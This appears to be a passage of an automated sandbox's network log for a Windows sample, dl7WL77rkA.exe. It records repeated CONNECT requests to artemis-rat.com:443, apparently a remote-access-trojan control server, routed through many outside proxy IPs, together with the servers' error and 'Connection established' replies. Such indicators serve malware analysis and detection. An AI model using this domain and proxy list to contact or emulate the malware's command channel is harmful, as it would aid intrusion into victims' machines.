                                                                                                                                                                                                                                                            330192.168.2.551121202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.930665016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            331192.168.2.550913162.159.242.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.930706978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.092463970 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            332192.168.2.55077779.101.55.161532813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.933480024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.623655081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.623701096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702356100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            333192.168.2.550938104.25.167.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.935653925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.089925051 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            334192.168.2.550921107.180.101.226353163876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.935656071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            335192.168.2.55087923.152.40.1431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.935722113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.168452024 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.843703985 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:40.516115904 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:41.863364935 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:44.743750095 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:50.115781069 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:00.871052027 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:22.371907949 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            336192.168.2.55088138.162.28.21831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.936075926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.372890949 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            337192.168.2.550955172.67.182.145803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.943427086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.098802090 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            338192.168.2.550815121.41.66.24280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.965590000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.295854092 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            339192.168.2.550977172.67.150.173803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.966319084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.124236107 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            340192.168.2.550967172.67.181.17803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968657970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.127374887 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            341192.168.2.550958104.17.16.87803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968660116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.126929998 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            342192.168.2.550800171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.969238997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            343192.168.2.55094012.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.969985008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            344192.168.2.550849195.25.20.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.972460985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.289763927 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            345192.168.2.550818103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.979985952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            346192.168.2.55081643.128.107.25188883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.984745026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.335746050 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            347192.168.2.55118541.86.252.914433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.989115953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            348192.168.2.55118941.86.252.914433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.990921974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            349192.168.2.550114203.96.177.211550053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.993762970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092549086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            350192.168.2.550992104.25.81.82803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.996726036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.157180071 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            351192.168.2.55094738.162.5.22331283876C:\Users\user\Desktop\dl7WL77rkA.exe
